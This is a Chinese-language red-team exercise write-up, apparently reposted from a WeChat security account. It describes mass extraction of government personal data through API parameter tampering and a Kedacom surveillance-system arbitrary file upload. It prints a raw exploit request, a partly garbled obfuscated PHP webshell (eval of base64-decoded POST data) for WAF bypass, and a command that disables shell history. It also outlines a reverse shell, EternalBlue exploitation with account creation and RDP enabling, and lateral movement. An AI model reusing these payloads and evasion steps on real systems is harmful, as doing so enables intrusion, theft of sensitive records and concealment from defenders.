【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

admin 2025年5月6日09:54:28【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游已关闭评论3 views字数 1448阅读4分49秒阅读模式

前言

作为资历混子Web🐶,日常负责端茶倒水之余,浅谈下如何在如今全是大牛子环境下存活,发挥出牛马个人最大价值,Hvv巧妙Nday利用,本文仅此记录学习分享,如若有不对之处,望大佬们指正。

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

免责声明:

由于传播、利用Polaris本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责。仅记录学习使用。

正文

接口泄露

政务、教育行业作为最常见突破点,寻找学号,工号,弱口令进入后台,sql/文件上传等拿Webshell权限。因此会多人忽略数据泄露分.

某政X单位,注册进入后台,个人信息查询处简单fuzz一下进行后端传参校验碰撞,导致拼接替换参数造成获取X百万敏感信息


            https://www.xxx.com/1234/qqquser/detaili?id=xxx
          

正常查询,替换接口如下:


            https://www.xxx.com/1234/qqquser/list?size=1
          
【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

            https://www.xxx.com/1234/qqquser/detaili
          

缺少参数报错,得到的值为百万级。【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游


            https://www.xxx.com/1234/qqquser/exportList?xzqhcode=xxxxxx
          

且通过接口发现123456处为省份邮政编码,再次替换遍历接口。

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游
【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

重复以上操作,替换邮政编码与ID值,最终获取X百万级敏感信息。

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游
【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

            https://github.com/gh0stkey/HaE/
          
            https://github.com/gh0stkey/CaA/
          

(此处推荐插件Hae与CaA,通过数据包正则匹配高亮定位敏感信息,结合CaA收集的参数接口用于方便Fuzz)

Nday积累

往年Hvv前网上都会爆出大量Poc文档、库等,但多数都不太全。或由于漏洞敏感导致后期漏洞已下架等。建议汇总编写整理漏洞库payload自行写成验证工具效率加倍。参考Xray模板,嵌套就行。

(文章末尾整理了近年较全漏洞库)

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游
【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

Kedacom视频监控系统-Nday

某次攻防中碰到的Kedacom视频监控系统任意文件上传。【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

POST /pmc-bin/upload_fcgi?uploadDir=../&uploadName=
            aaa.php
           HTTP/1.1Host: Pragma: no-cacheCache-Control: no-cacheAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryContent-Length: 164----WebKitFormBoundaryContent-Disposition: form-data; name="Filedata": filename="aaa"Content-Type: application/octet-streamtest123----WebKitFormBoundary--
【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游
Content-Disposition: form-data; name=="file";filename=1<php<<<<Content-Type: image/jpg<hqiu fang guo%>?=$a=<<<   aaassasssasssasssasssasssasssasssasssasssasssssssssssssaasssassssaa;fwrite(fopen("
            ppp888.php"
          ,"a"),'<?php*asas111*/eval/*asas111*/(/*asas111*/base64_decode/*asas111*/(base64ecode/*asas111*/(base64ecode/*asas111*/($_POST/*asas111*/["a"])))/*asas111*/)/*asas111*/:')?>-----------------35803941388997298198758721635Content-Disposition: form-data; name="submit"

存在Waf,天蝎马二次编码后成功上传解析。

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

绕过思路综合脑图:

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游进入内网:

遇到Linux系统优先考虑禁用历史命令记录功能:

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 

由于权限较低且操作系统为32位的Linux,反弹shell到VPS,可执行命令。

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

Tips: 热门内网扫描器无法使用时,可用gogo进行内网扫描。


            https://chainreactors.github.io/wiki/gogo/
          
【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

永恒之蓝:MSF反弹shell易打蓝屏,工具dll注入账号密码,编写把开RDP也加进该dll文件。


            https://github.com/abc123info/EquationToolsGUI
          

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游添加隧道代理,找到多网卡主机,跨网段。

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

海康未授权。(Yakit的Fuzz接口好用些。)【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游剩下就常规内网梭哈了,刷完收工。

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游
【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游

获取方式

本公众号回复【20250504】即可获取往年Poc汇总整理打包+文中脑图与工具

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月6日09:54:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Web攻防】安服存活指南-记某次攻防演练文件上传绕过到内网遨游https://cn-sec.com/archives/4031377.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.